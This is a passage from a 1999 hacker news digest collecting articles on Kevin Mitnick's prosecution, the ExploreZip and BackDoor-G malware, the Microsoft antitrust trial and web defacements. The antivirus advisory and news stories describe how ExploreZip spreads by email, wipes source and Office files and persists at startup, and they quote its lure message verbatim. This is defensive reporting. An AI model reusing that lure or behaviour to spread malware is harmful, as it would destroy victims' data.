suburban teenagers who hop a fence to jump into a
pool.
All of this would be great theater and a nice distraction
from the war in Kosovo if it weren't inspiring some
serious reprisals in the courts -- and some ominous
inflation in sentencing that could wind up affecting
everyone who uses computers in his or her daily life.
Wars on hackers are usually followed by calls for
legislators to "do something!" and campaigns for new
laws to crack down on the bad guys. The problem is
that "doing something" often produces laws that treat
the same action much more harshly in cyberspace than
in "meatspace."
The archetype of the demon hacker is
Kevin Mitnick, a young man who has
spent more than four years in jail
waiting for his trial. When he was
arrested, Monica Lewinsky was in her
last year of college. During this time,
Mitnick and his attorneys have jousted
with government lawyers in endless
pre-trial maneuvers that seem to have
ended recently when Mitnick decided to plead guilty,
probably hoping to receive a sentence that would be
limited to time served. But even that deal is uncertain
and taking forever to evolve; meanwhile, for Mitnick
it's just prison without a trial and with no bail.
Many, no doubt, see the crackdown on folks like
Kevin Mitnick as a great deal for society: Information
can be stolen just like anything else; surely the thieves
who traffic in such goods should be locked up, just
like car-jackers and muggers.
But there's also a hidden danger. The precedents that
the courts set now for dealing with demons like
Mitnick will also apply equally to everyone who
follows. And it's not clear that the world is ready for
Mitnick-like sentences for the crimes he might have
committed, which remain murkily defined.
Think about it: Someone who reads another person's
Rolodex is just a snoop, but someone who clicks
through somebody else's Palm Pilot is hacking a
computer database.
It's easy to see just how slippery the calculus of evil
gets on the cutting edge of technology. 2600
Magazine, The Hacker Quarterly, recently posted
letters from computer manufacturers like Sun and
Motorola estimating their losses to Mitnick's alleged
theft of computer source code. After Mitnick's arrest,
he was said to have stolen billions of dollars of
information. Some companies calculated their loss by
simply listing the hundreds of millions of dollars in
development cost of the software affected -- that is,
the cost of all the programmers, their computers and
other overhead. Other companies were a bit more
careful and noted that the value was difficult to judge,
but that recalls of products like cell phones could be
costly.
The problem is, the price tag of information is almost
impossible to determine. If Mitnick did take a copy of
these companies' source code, the companies weren't
denied the use of it, as when a mugger steals cash.
Mitnick's lawyers seem ready to point out that the
companies involved didn't bother to announce an
official price on what they lost to Mitnick -- something
that the Securities and Exchange Commission requires
public companies to do if the losses are significant
enough. That would have required strict accounting
measures.
To make matters even cloudier, in the meantime, Sun
Microsystems began giving away the source code to its
operating system to students around the world. In
other words, if Mitnick had only waited a few years,
enrolled in a university and asked nicely, he might
have been a poster boy for Sun's charity instead of a
prisoner. Today, Sun is even circulating the source
code to products like Java in hope of recruiting
customers and snagging bug fixes. The company is
practically begging people around the world to come
take a look at its code.
This big change in the customs and attitudes of the
software industry strains the arguments against
hackers. If giving away the source code is now a
"good thing" for corporations, did Mitnick and the
other hackers do a smaller good thing by grabbing it
ahead of time? Is Mitnick now a bit closer to being a
Robin Hood instead of a demon? If Linux triumphs,
will children be told tales of the dark days when the
Sheriff of Notingham sat on the boards of all of the
corporations and forced them to keep their source
code proprietary so only the nobles could enjoy its
bounty? Is it true that begging forgiveness is always
easier than asking permission?
Such questions may be impossible to answer, but they
illustrate just how confusing it can be in the
nether-netherworld of information's hall of mirrors. As
a commodity, information is fundamentally different
from objects, and society has always graced it with
special respect. The journalists who printed the stories
about the allegedly racist words that appeared on a
secret audio tape of Texaco employees looked like
crusaders. But if it had been a digital tape, the
reporters could be painted as hacking data compiled by
a Texaco employee on Texaco time.
In the long run, society is going to have to think
differently about hackers and the crimes with which
they are charged. Taking information when it's printed
on paper is not always bad, and there's no reason we
should change this rule just because the information is
stored on a computer disk. The intent of the criminal
and the extent of the malice has always played a
crucial role in our system of criminal justice. Many
owners of things will forgive a theft if the "borrower"
merely returns it unharmed. Crimes like trespassing
are rarely prosecuted if someone just hops a fence and
does no damage.
Computers and the Internet continue to frighten
people, but prosecuting hackers runs the danger of
setting nasty precedents that will begin to snare regular
people, not programmers. Many convicted hackers are
released from prison only to be denied the ability to
use a computer or the Internet. In the past, this made
it impossible for a person to get work as a
programmer; today, they can't even push the order
screen at McDonald's. After all, it's hooked up to a
central database -- who knows what havoc a hacker
could wreak while punching up an order of fries?
One of the best ways to put this all in context is to
take yourself back in time 100 years to the turn of the
last century, when auto racing was just beginning to
roar across the scene. The machines were grand in
size and sound if not in speed -- Emile Levassor won
the 1895 Paris-Bordeaux race with his
four-horsepower jack rabbit that covered the distance
at an average speed of 14.9 mph. Feats of technical
prowess like that frightened the world, and by 1903
the French government was shutting down auto races
-- or restricting the death-defying machines to a
bearable 20 mph.
A few decades later, James Dean became a rebel
automobile hacker who scared parents around the
globe. Today, he's just another cutie pie competing
with Hanson for poster space on dorm room walls.
One era's demon is another's icon. Is teen idol the next
stop for Kevin Mitnick?
salon.com | June 9, 1999
- - - - - - - - - - - -
About the writer
Peter Wayner is the author of
"Disappearing Cryptography," "Digital
Cash" and "Digital Copyright Protection."
@HWA
23.0 More Email Worms/Trojan
~~~~~~~~~~~~~~~~~~~~~~~~
June 10th 1999
From HNN http://www.hackernews.com/
More Email Worms/Trojan
contributed by zuc
Symantec has discovered a new malicious piece of
software that travels as an email attachment named
"zipped_files.exe". Similar to Melissa this worm/trojan
uses the MAPI commands and Microsoft Outlook on
Windows systems to replicate. This code was originally
discovered in Israel.
Symantec
http://www.symantec.com/avcenter/venc/data/worm.explore.zip.html
Worm.ExploreZip
Virus Name: Worm.ExploreZip
Aliases: W32.ExploreZip Worm
Infection Length: 210,432 bytes
Area of Infection: Windows System directory, Email Attachments
Likelihood: Common, Worldwide
Detected as of: June 6, 1999
Characteristics: Worm, Trojan Horse
Overview:
Worm.ExploreZip is a worm that contains a malicious payload. The worm
utilizes Microsoft Outlook, Outlook Express, Exchange to mail itself out by
replying to unread messages in your Inbox. The worm will also search the
mapped drives and networked machines for Windows installations and copy
itself to the Windows directory of the remote machine and modify the
WIN.INI accordingly.
The payload of the worm will destroy any file with the extension .h, .c, .cpp,
.asm, .doc, .ppt, or .xls on your hard drives, any mapped drives, and any
network machines that are accessible each time it is executed. This continues
to occur until the worm is removed.
You may receive the worm as an attachment called zipped_files.exe. When
run, this executable will copy itself to your Windows System directory with the
filename Explore.exe or to your Windows directory with the filename
_setup.exe. The worm modifies your WIN.INI or registry such that the file
Explore.exe is executed each time you start Windows
The worm was first discovered in Israel and submitted to the Symantec
AntiVirus Research Center on June 6, 1999.
Technical Description:
Worm.ExploreZip utilizes MAPI commands and Microsoft
Outlook/Microsoft Exchange on Windows 9x and NT systems to propagate
itself.
The worm e-mails itself out as an attachment with the filename
zipped_files.exe in reply to unread messages it finds in your Inbox. Once it
responds to a message in your Inbox, it will mark it so it will not respond to
the message again. The e-mail message sent may appear to come from a
known e-mail correspondent in response to a previously sent e-mail with the
appropriate subject line and contains the following text:
Hi Recipient Name!
I received your email and I shall send you a reply ASAP.
Till then, take a look at the attached zipped docs.
bye or sincerely Recipient Name
The worm will continue to monitor the Inbox for new messages and respond
accordingly.
The worm will also search the mapped drives and networked machines for
Windows installations and copy itself to the Windows directory of the remote
machine and modify the WIN.INI accordingly.
Once the attachment is executed, it may display the following window:
The button displayed is the "OK" button and is dependent on the language of
the infected operating system. The example above was taken from a Hebrew
Windows system.
The worm also copies itself to the Windows System (System32 on Windows
NT) directory with the filename Explore.exe or _setup.exe and also modifies
the WIN.INI file (Windows 9x) or the registry (on Windows NT) so, the
program is executed each time Windows is started. You may find this file
under your Windows Temporary directory or your attachments directory as
well depending on the e-mail client you are using. E-mail clients will often
temporarily store e-mail attachments in these directories under different
temporary names.
Payload:
In addition, when Worm.ExploreZip is executed, it also searches through the
C through Z drives of your computer system and accessible network machines
for particular files. The worm selects a series of files to destroy of multiple file
extensions (including .h, .c, .cpp, .asm, .doc, .xls, .ppt) by calling CreateFile()
and making them 0 bytes long. One may notice extended hard drive activity
when this occurs. This can result in non-recoverable data.
This payload routine continues to happen while the worm is active on the
system. Thus, any newly created files matching the extensions list will be
destroyed as well.
Repair Notes:
Symantec AntiVirus Research Center has also provided a small utility called
KILL_EZ to remove the virus from memory to avoid rebooting from a clean
system disk. For more information on KILL_EZ utility, refer to the following
URL:
http://www.sarc.com/avcenter/kill_ez.html
To remove this worm manually, one should perform the following steps:
1.Remove the line
run=\Explore.exe
or
run=\_setup.exe
from the WIN.INI file for Windows 9x systems.
For Windows NT, remove the registry entry
HKEY_CURRENT_USER\Software\Microsoft\Windows
NT\CurrentVersion\Windows\Run
which will refer to Explore.exe or _setup.exe
2.Delete the file Explore.exe or _setup.exe. One may need to reboot first
or kill the process using Task Manager or Process View (if the file is
currently in use).
Norton AntiVirus users can protect themselves from this worm by
downloading the current virus definitions either through LiveUpdate or from
the following webpage:
http://www.symantec.com/avcenter/download.html
Write-up by: Eric Chien
Written: June 6, 1999
Update: June 11, 1999
@HWA
24.0 Stanford Searches for "Hacker"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 10th 1999
From HNN http://www.hackernews.com/
Stanford Searches for "Hacker"
contributed by Dead.Under.Water
Stanford University was a victim of a spammer recently.
A message, sent to some 25,000 Stanford email
accounts, accused the school of giving housing
preferences to minorities. Prosecutor Julius Finkelstein,
head of Santa Clara County's high-tech crimes unit, said
the "hacker" could be charged with such offenses as
unauthorized use of a computer account and
harassment via e-mail. Evidently sending hate filled
emails grants you the hacker moniker?
Yahoo News
http://dailynews.yahoo.com/headlines/ap/technology/story.html?s=v/ap/19990603/tc/racist_mail_1.html
( this link didn't work as of June 24th -Ed )
@HWA
25.0 Mitnick Demo Pictures now Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 10th 1999
From HNN http://www.hackernews.com/
Mitnick Demo Pictures now Available
contributed by Macki
Pictures of the FREE KEVIN Demonstrations held last
week in front of federal courthouses across the country
have been posted. Pictures from the demonstrations in
Cleveland, New York, and Moscow have been made
available at the FREE KEVIN Demos website. Kevin
Mitnick's sentencing hearing is scheduled for Monday,
June 14th.
FREE KEVIN Demonstrations
http://www.2600.com/demo/index.html
26.0 Does Cracking Affect Consumer Confidence?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 10th 1999
From HNN http://www.hackernews.com/
Does Cracking Affect Consumer Confidence?
contributed by evenprime
Eric Lundquist thinks that it is wrong to crack servers
because doing so undermines consumers' confidence in
e-commerce. (In my opinion consumers would be wise
not to trust e-commerace.) Interesting how the author
never gets around to blaming vendors who tell people to
place their trust in the rubbish that is being sold.
ZD Net
http://www.zdnet.com/zdnn/stories/comment/0,5859,406094,00.html
27.0 Worm.ExploreZip is Causing Massive Damage
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 11th 1999
From HNN http://www.hackernews.com/
contributed by Merlock
Worm.ExploreZip is quickly spreading across the world.
First discovered last Sunday in Israel it has propagated
into some of the largest companies in the US. The
transmission method of this program is similar to Melissa
which uses the email addresses in Microsoft Outlook
address book, Worm.ExploreZip however, automatically
replies to the incoming email of MS Exchange or MS
Outlook users. Unlike Melissa Worm.ExploreZip carries a
very malicious payload that will actually delete certain
files and modify others. Companies such as Boeing, Price
Waterhouse Coopers, GTE, and General Electric have
lost entire hard drives to this virus. Many companies are
attempting to be proactive by disconnecting themselves
from the internet. Only users of Microsoft products are
effected by this latest threat.
ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/worm990610.html
C|Net
http://www.news.com/News/Item/0,4,37658,00.html?st.ne.fd.gif.d
MSNBC
http://www.msnbc.com/news/278660.asp
ZD Net
http://www.zdnet.com/pcweek/stories/news/0,4153,2273659,00.html
Nando Times
http://www.techserver.com/story/body/0,1634,58370-93054-664175-0,00.html
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,11334,00.html
ZD Net
http://www.zdnet.com/zdnn/special/doublevirus.html
C|Net;
Data virus forces email shutdowns
By Kim Girard
Staff Writer, CNET News.com
June 10, 1999, 7:10 p.m. PT
update Corporations are scrambling to cope with a new data-destroying virus that is forcing the shutdown of email
systems nationwide.
The virus, first reported to the Symantec Antivirus Research Center on Sunday by five companies in Israel, is called
Worm.ExploreZip or Troj_Explore.Zip. The worm uses Mail Application Programming Interface (MAPI) commands and Microsoft
Outlook on Windows systems to propagate itself, Symantec said.
In some ways, the virus is the sequel to the Melissa virus, which spread with unprecedented speed in March. Worm.ExploreZip
spreads from computer to computer by taking advantage of automation features available to people using Microsoft email software
on Windows machines.
Although the new virus doesn't spread as fast as Melissa, it causes more damage, according to antivirus experts, deleting
Microsoft Word, Excel, and Powerpoint document files, among others. (See CNET Topic Center on antivirus software.)
Several firms have shut down their email systems entirely while IS staff root out the virus,
according to Symantec.
Boeing was hit particularly hard. The Seattle-based aerospace giant shut down its email system,
which is used by at least 150,000 employees, at 2:30 p.m. today, a company spokesman said.
The company was still assessing the damage caused by the virus, but the spokesman, who
asked not to be named, said he knew of at least one employee whose entire hard drive was wiped
out.
"As soon as we became aware of it, we told everyone, and we put a message up on our internal
Web site," he said. Late in the day the email still had not been restored. The company hopes to
have it back up by tomorrow.
PricewaterhouseCoopers took down its entire email system, used by 45,000 U.S. employees,
also at 2:30 p.m. in response to the virus. The company was just bringing up parts of the system
at 7 p.m., a company spokesman said, but he didn't know how much damage had been done or
how many workers had been affected.
Some companies said they disarmed the virus--actually a software "worm"--before it could cause
many problems. Microsoft, for example, disconnected its email servers from the Internet at about 9
a.m. so that programmers could work on an antidote, company spokesman Dan Leach said. The
servers were up and running two hours later, he added.
Employees of antivirus software maker Symantec report that they have received email that
includes the worm, which arrives as an attachment to the missives. Companies such as General
Electric and Southern Company have had files deleted by the virus, according to Bloomberg.
Virus protection firm Trend Micro spokeswoman Susan Orbuch said earlier today that the company had received 107 calls from
customers concerning the virus. Thirteen of those calls came from those already infected, she said.
Orbuch said that Trend Micro knew of five large companies that had been infected, as well as several public relations firms and a
magazine. She declined to name the companies.
Nate Meyer, spokesman for Credit Suisse First Boston, said the virus had struck the company's
offices in New York, San Francisco, and Palo Alto, California, and that other offices worldwide may
have been affected. He said he did not know how many of the company's computers were infected.
Meyer said the Credit Suisse's technology department had been working on the problem for much of
the day and had sent out a warning about it this morning. But he said the virus did not seem to have
slowed the company's operations, adding that it had not disrupted the investment company's stock
trading. Meyer noted that his own email had been working throughout the day.
Quick repairs
Representatives at AT&T and Intel reported that they were able to quickly repair their systems after
being hit by the virus.
"These are things that we have to do because of the communications reality that we live in today,"
an AT&T spokeswoman said.
The virus disrupted work at Cambridge, Massachusetts-based industry analyst firm Forrester
Research, where Internet access, including email, was cut off. Another analyst firm, Current
Analysis, sent email to customers warning them not open any email attachments coming from the
firm with the .exe extension because an employee's PC had been infected.
The infected email may contain the message: "Hi [recipient name]! I received your email and I shall send you a reply ASAP. Till
then, take a look at the attached zipped docs. bye."
Unlike the Melissa virus, which harvested from a user's address book, the new virus raids an email in-box when executed through
Microsoft Exchange or Outlook. The worm attaches itself as a file called zip_files.exe and is sent off with a return email. Although
the virus isn't expected to spread as quickly and to as many computers as Melissa did, it does destroy files.
"It's an .exe file posing as a Zip file," said Eric Chien, senior researcher at the Symantec Antivirus Research Center. The worm is
particularly insidious because it searches through hard drives and destroys files with extensions of .doc, .xls, .ppt, .c, .cpp, .h, or
.asm, he said.
Chien said that means whoever wrote the virus was targeting corporations--seeking to destroy developers' source code, as
well as documents created using Microsoft Office applications, such as Word and Excel.
"It singles out those files and destroys them," he said. "This hits the local drive and the file server."
Extent of damage not known
Chien said it is unclear how much damage the virus has done. "We've received multiple reports from major corporations in
the U.S.," he said. "What we're hoping is that the initial jump on this Sunday night will prevent it from spreading."
Panda Software said it has added free downloads for the detection and disinfection of the virus--which it called "extremely
dangerous"--on its Web site. The company also urged people to update antivirus software.
Esther Shin, a public relations specialist at Aventail, a Seattle-based business-to-business e-commerce firm, said two of
her colleagues encountered the virus this morning. One of them lost all the files on his hard drive after he opened the
attachment, she added.
The email was worded to make the recipient believe that the message came from a Microsoft employee, she said. Shin
said she got a similar email but didn't open the attachment.
"When I got hit I called all my contacts," she said.
Bloomberg and News.com's Troy Wolverton, Dan Goodin, and Tim Clark contributed to this report.
@HWA
28.0 Don't Forget About BackDoor-G, it is Still Around
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 11th 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
Don't forget about BackDoor-G. It also arrives as an
email attachment but instead of deleting files this one
could allow someone else to control your computer
behind the veil of a screensaver.
The Irish Times
http://www.ireland.com/newspaper/finance/1999/0604/fin320.htm
Bug hits big screen by the backdoor
Backdoor-G virus arrives by e-mail and sets up a
screensaver which lets hacker control computer
remotely
As if you didn't already have enough worries. The wary
computer user already feels bunkered in and hunkered down,
in between hiding behind firewalls, running anti-virus programs
and keeping a watchful eye on suspiciouslooking e-mails.
You have to look out for infected files on floppy disks, panic
over the latest holes in e-mail programs, and be cautious with
how you set up company and personal websites. It's almost
enough to send you back to a manual typewriter.
Now comes an insidious screensaver virus - a new computer
devastator that sneaks into your system via an e-mail and sets
up a screensaver which lets some badguy hacker control your
computer remotely, download files, and all that other stuff that
appears in Tom Cruise films but which we would all rather
believe couldn't happen in real life.
According to security software company Network Associates,
Backdoor-G is a so-called "trojan horse" program, which
arrives into your computer hidden inside an attack program
which potential victims receive as an unsolicited e-mail. The
program has reportedly taken the form of both a screensaver
and an update to a computer game.
Open the e-mail and the program installs itself, allowing
Backdoor-G to turn the victim's computer into a client system.
In other words, it allows a hacker to operate the victim's
computer remotely over the Internet. The hacker can thus gain
access to just about anything on the victim's computer.
Unfortunately, it's also almost impossible to detect once it
executes because it is capable of changing its file name. And
according to Network Associates, it spreads everywhere in
your computer's system.
Admittedly, the screensaver aspect of this virus has its
amusement potential - hmmm, can't we all imagine a bitter and
twisted screensaver we'd like to design to announce our
conquest of the computer belonging to some particularly
detested person in our lives? But the arrival of Backdoor-G is
probably more apt to make you sigh in exasperation.
Computers were supposed to make life easier, more
manageable, more controllable. Okay, you can stop laughing,
but you know what I mean. Instead, they just seem to bring
more stress, hair loss, heartburn and overly-chewed fingernails.
But it's perhaps wise to remind computer users that many, if
not most, aggravations come not from the machines or even,
sometimes, the software. They come from humans who still
make far too many assumptions about what computers,
software, and the Internet can or cannot do.
Partly, that's our fault, because we accept products from
hardware and software vendors which in any other industry
would be considered too unreliable, unstable and under-tested
to be released onto the market.
We believe the vendors when they excuse themselves by telling
us it's all too complicated to explain, it's the nature of the
medium and so forth. That's appalling, but as long as we lack
the collective spine to demand better, we're stuck with what
we get.
But it's hard to see how we can obliterate the virus problem,
since a computer is a sitting duck for viruses because of the
way in which we use them - sharing disks, transferring files,
going on and off the Net and downloading things from places
we don't know. Few people take even basic precautions
against viruses and so, these things spread. In addition, many
people never bother to make backups of their work, and thus
are twicedevastated if struck by a virus or another form of
computer attack.
And even if the anti-virus software makers come up with a fix
to one virus, some hacker is always brewing another that we
cannot yet imagine. In the days that it takes to create an
antidote, thousands or millions can be hit.
In the case of particularly nasty viruses, entire companies can
be brought down at the cost to the global economy of billions
of pounds.
So what's a poor computer user to do? There's not much else
to recommend but to proceed with caution, which means
educating yourself on how to keep your own machine as clean
as possible by being vigilant against viruses and other forms of
computer attack.
Buy a good virus-scanning software package and use it. Be
wary about what you download off the Net and scan it first.
Don't open e-mail with attachments unless you know the
sender (and even then, be cautious about all attachments).
And create backups. Anyone who has ever lost irreplaceable,
important files off a floppy disk or hard-drive knows the
excruciating pain of that particular experience.
You may still have to clean up a computer if a virus brings it
down - and that's not a pleasant task - but having your files
intact somewhere else at least keeps the misery from reaching
bottomless depths. [SBX]
A detector for the Backdoor-G virus is online at www.nai.com
@HWA
29.0 MS Antritrust Trial Looks at Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 11th 1999
From HNN http://www.hackernews.com/
contributed by m4in
District Court Judge Thomas Jackson has asked a
government expert witness whether removing the
browser from Windows will increase or diminish its
security. Analysts think that the judge is wondering
what the repercussions are of including the browser
with the operating system.
C|Net
http://www.news.com/News/Item/0,4,37649,00.htm
Wired
http://www.wired.com/news/news/politics/story/20139.html
C|Net's link seems to have died heres the wired story;
Will Curiosity Kill the Browser?
by Declan McCullagh
12:15 p.m. 10.Jun.99.PDT
WASHINGTON -- On the last day of the
government's case, the federal judge
overseeing the Microsoft antitrust trial
asked Thursday if including a browser
with Windows could weaken a computer's
security.
"Are there any security issues involved in
the choice of a browser [that may
increase] the risk of penetration by a
virus or something like that?" US District
Judge Thomas Penfield Jackson asked a
witness testifying for the government.
Read ongoing US v. Microsoft coverage
Edward Felten, a Princeton University
scientist, said that some
security-conscious network
administrators may prefer to have no
browsers on computers. Felten was the
last witness called by the government,
and Microsoft will call its rebuttal
witnesses starting Monday.
"Is there any way of absolutely assuring
security?" Jackson asked. He also
wondered which browsers are safer than
others.
Reading the portents in a judge's
questions is, of course, a perilous task.
Some wags in the press gallery suggested
that His Honor must be shopping for a
computer. Or was the
technology-impaired Jackson simply
confused?
But the theory, if true, that would be
most damaging to Microsoft goes like
this: Jackson is wondering what the
downsides are to Microsoft's decision to
include Internet Explorer with Windows.
This became an important question since
a decision last summer by an appeals
court, which unceremoniously overturned
Jackson's December 1997 decision on a
related Justice v. Microsoft case. In a
2-1 decision, the panel said judges should
be "deferential to entrepreneurs' product
design choices" and companies should be
free to integrate products as they see fit
-- so long as the improvements benefit
customers.
Jackson's comments could mean that he
plans to weigh whether or not Microsoft's
decision to integrate Internet Explorer
with Windows was, on the whole, a good
thing for the general public. Other
government witnesses earlier in the trial
have offered additional reasons why
welding IE into the operating system
reduces consumer choice.
Microsoft has claimed that including IE
produces a more useful product with
Internet functionality that third-party
software developers can rely on.
Jim Allchin, a Microsoft vice president,
testified that these features "simply
cannot be achieved through the use of
add-on products from third parties."
But Felten said there was no reason
Internet Explorer had to be shipped with
the operating system.
"Microsoft can deliver a version of
Windows 98 from which the Internet
Explorer browser has been removed and
deliver it in such a way that does not
affect the non-Web browsing functions of
Windows 98," he said.
The Justice Department pointed to a
January 1997 email message from Allchin
to Bill Gates that said another executive
wanted Win98 "minus IE 4.0 in June.... IE
4.0 can be added next year."
Felten claimed he had designed a program
that removes browsing capability from
Windows 98. But Microsoft had Felten
demonstrate it and showed him he had
not actually removed Web browsing
features.
The trial will continue on Monday when
Microsoft calls AOL's David Colburn as a
hostile witness. Microsoft said it will
challenge the credibility of Colburn, an
AOL executive who was a government
witness earlier.
@HWA
30.0 Web Defacements Hindering Open Government
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 11th 1999
From HNN http://www.hackernews.com/
contributed by Code Kid
Eric Lundquist claims that web page defacements hold
back the development of a web accessible government
and that penalties for such actions should be
proportional to the damage caused. Getting people to
vote or file taxes online is difficult if government web
sites can't keep the intruders out.
MSNBC
http://www.msnbc.com/news/278369.asp
Hacking is no longer merely a prank
COMMENTARY: Hacking retards the growth of a
Web-accessible government and should hold penalties
proportional to the crime
By Eric Lundquist, PC Week
ZDNN
June 9 — Getting your site hacked used to be
simply an embarrassment. Your carefully
designed home page suddenly became a
billboard for lewdness, racism or whatever the
hacker desired to create. However, now — and
more so in the future — a hacked site is a public
indication that you are not ready to play in the
digital age. Companies and government
organizations are now realizing this, and hackers
who protest that a hack is a prank are finding
that a prank can result in a bunch of FBI agents
coming through the front door.
IN THIS DIGITAL AGE, your company — whether it
be an Amazon, E-Trade or some idea still forming — is
built on a brand, a process and an information infrastructure.
The way your site appears on the Web; the process by
which a Web visitor can maneuver and buy products; and
the ability of your site to scale, connect to suppliers and
customers, and securely maintain a digital relation will
determine your success.
Sites that scale and allow you to shop comfortably in a
digital store can quickly extend their brands from books to
auctions to pet foods and beyond.
Sites that crumble while you and the rest of the
panicked investment community try to bail out on a stock
will find themselves abandoned and facing a new realm of
legal liabilities. Hacked sites visibly and fundamentally shake
the faith in the brand and the products being offered at the
digital storefront.
This loss of faith in the brand carries over to and is
magnified in the government realm. Internet access is on the
verge of becoming sufficiently ubiquitous to allow
organizational functions to move to the Web.
If the first big thing the Web allowed was personal
access and community building from the ground up, the next
big thing is allowing existing organizations to use the Web to
assume previously cumbersome functions. Vote on the
Web? Sure. Register your car via the Web. File your taxes.
Get your refund. All these functions are certainly possible.
What is missing is trust. Trust is a difficult dimension to
describe, but it most clearly is apparent in its absence.
Don’t ask a citizenry to register to vote via the Web if the
government’s top legal agencies can’t keep their home
pages free from graffiti.
And it is the trust that is shaken when the White House
site is hacked. Or the FBI site. Or the Senate site. Hacking
is more than breaking a few minor laws. Hacking is certainly
not just being a good digital citizen by showing the security
gaps that now exist to prevent more serious transgressions
in the future.
Hacking is neither clever nor funny, nor something to
be tossed off as adolescent humor from sci-fi-addled minds.
Hacking retards the growth of a Web-accessible
government and should hold penalties proportional to the
crime.
31.0 Worm.ExploreZip Continues its Rampage
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 14th 1999
From HNN http://www.hackernews.com/
contributed by nvirB
After forcing some companies to completely shut down
thier networks and keeping some administrators at work
all weekend people are bracing for Worm.ExploreZip to
resurface with a vengeance today as employees return
to work. While Worm.ExploreZip has the fast spreading
capabilities of Melissa it also contains a very destructive
payload that can delete files. IT administrators are
bracing for the expected onslaught of inevitable
mutations.
MSNBC
http://www.msnbc.com/news/278660.asp
Nando Times
http://www.techserver.com/story/body/0,1634,59360-94597-674149-0,00.html
C|Net
http://www.news.com/News/Item/0,4,37697,00.html?st.ne.fd.tohhed.ni
FBI and NIPC On the Hunt
The FBI is hot on the trail looking for the creator of
Worm.ExplorerZip. This is probably more of a PR stunt
than anything. The odds of them actually finding
whoever created this are slim to none.
ZD Net
HTTP://www.zdnet.com/zdtv/cybercrime/viruswatch/story/0,3700,2274493,00.html
Wired
http://www.wired.com/news/news/technology/story/20168.html
Mac Vulnerable Too
Symantec Utilities is claiming that if a Mac user runs
Windows emulation software, names files with .doc,
.ppt, .xls, etc..., and either checks his mail under
emulation or is on a mixed environment network it is
possible to contract this worm. (Ed Note: Any Mac user
who is running this brain dead setup deserves to be
infected.)
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2274574,00.html
C|Net;
How the email worm works
By Stephen Shankland
Staff Writer, CNET News.com
June 10, 1999, 6:15 p.m. PT
The Worm.ExploreZip virus, while different in some functional details from the Melissa virus that hit in March, takes
advantage of a similar vulnerability: The fact that so many people now routinely use email.
The new virus emerged this week, spreading from user to user by taking advantage of automation features available to users of
Microsoft email software on Windows machines.
Like Melissa, it requires some active participation of the victim: opening the malicious file, or
"payload," attached to the email message. And again like Melissa, the malicious program then
modifies the victim's computer system to send more copies of itself automatically by email. (See
CNET Topic Center on antivirus software.)
To encourage a person to open the attachment, both malicious programs use the similar ploy:
Trick the victim into thinking he or she has just received a useful document from a trusted source.
Both programs can get away with this, because the infected email comes from a person likely to
be known by the recipient.
But there the differences end. Where Melissa was relatively benign to users, Worm.ExploreZip
deletes Microsoft Word, Excel, and Powerpoint document files, said Wes Wasson, head of
security products marketing at Network Associates.
Where Melissa tapped into address books set up in Microsoft Outlook, Worm.ExploreZip's modus
operandi is just to bounce back incoming email automatically with a response including the
malicious program, Wasson said.
That means Worm.ExploreZip will spread more slowly, he said. "How fast it spreads correlates to
how many emails you get," he said.
Melissa, on the other hand, sent itself to 50 entries in the address book, and those entries
themselves could each be mailing lists.
Regardless of their propagation rate, both viruses depend on automated email features.
Worm.ExploreZip basically uses a modified version of the same feature that allows a person on vacation to set up email software
to automatically reply with an "try back later" message, Wasson said.
The advent of email as a distribution mechanism has allowed a new class of viruses, Wasson said. In the old days, viruses had to
be smaller, but Worm.ExploreZip is comparatively huge at more than 200 kilobytes, he said.
"Now with email, I don't have to be slim like I was before," Wasson said. "Viruses and worms can be
written in [the programming language] C. This is really cutting-edge science."
The increasing power of email viruses means that sophisticated hackers who once looked down on
viruses now see them as powerful tools to obtain information stored on target computers, particularly
because using email makes it easier to obscure the origin of the attack, he said.
"The hacker believes the virus is going to be more of a stealth approach," he said.
Selling security
Antivirus software sellers profit from virus scares. Sales of antivirus software jumped 67 percent in
the week the Melissa virus hit, according to market research firm PC Data.
Network Associates' Wasson acknowledges the sales boost, but insists his company is out there
to help people, pointing as evidence to the company's free, virus clinic detection services available
over the Internet.
"Rather than hold [people] hostage and take advantage of an incident, we'll give it to them for free," he said.
Network Associates' competitor TrendMicro offers a similar service.
As more companies begin to become more wary of the risks posed by the Internet, Network Associates is offering more security
consulting services. For example, the company hires itself out to find vulnerabilities in computer systems, Wasson said.
"Customers come to us all the time, saying check my security out, bang on my firewall," he said, referring to the protective
software designed to keep computer networks safe from unauthorized access.
In addition, the company is offering new software next month called CyberCop Sting that not only sets off alarms when there's a
burglar, but also lets companies set up decoy systems to lure intruders and record information about them, Wasson said. The
strategy is similar to the technique described by author Clifford Stoll in his book, The Cuckoo's Egg: Tracking a Spy Through the
Maze of Computer Espionage.
-=-
FBI investigating email worm
By Tim Clark
Staff Writer, CNET News.com
June 11, 1999, 3:00 p.m. PT
update In the wake of yesterday's attack by the virulent Worm.ExploreZip virus, the FBI said it is investigating the case
as a possible crime.
"As was the case with Melissa, the transmission of a virus can be a criminal matter, and the FBI is investigating," said Michael
Vatis, director of the National Infrastructure Protection Center (NPIC).
Vatis said the worm has the potential of doing significant damage to private sector and government computer systems. (See
CNET Topic Center on antivirus software.)
"It is critical for computer users to be aware of and take the well-publicized steps to protect against and mitigate potential damage
caused by malicious code," he said in a statement released this afternoon.
He added that transmission of malicious code can be a federal criminal offense and that the FBI is "aggressively investigating" the
matter.
The National Infrastructure Protection Center is monitoring developments and coordinating field office investigations, he said,
urging victims of the virus to contact the FBI field office nearest them, or the NIPC Watch and Warning Unit, which can be
reached by email at nipc.watch@fbi.gov.
"Because of the destructive payload delivered by this virus, its potential impact is significant," Vatis said. "All email users should
exercise caution when reading their email for the next few days and bring unusual messages to the attention of their system
administrator."
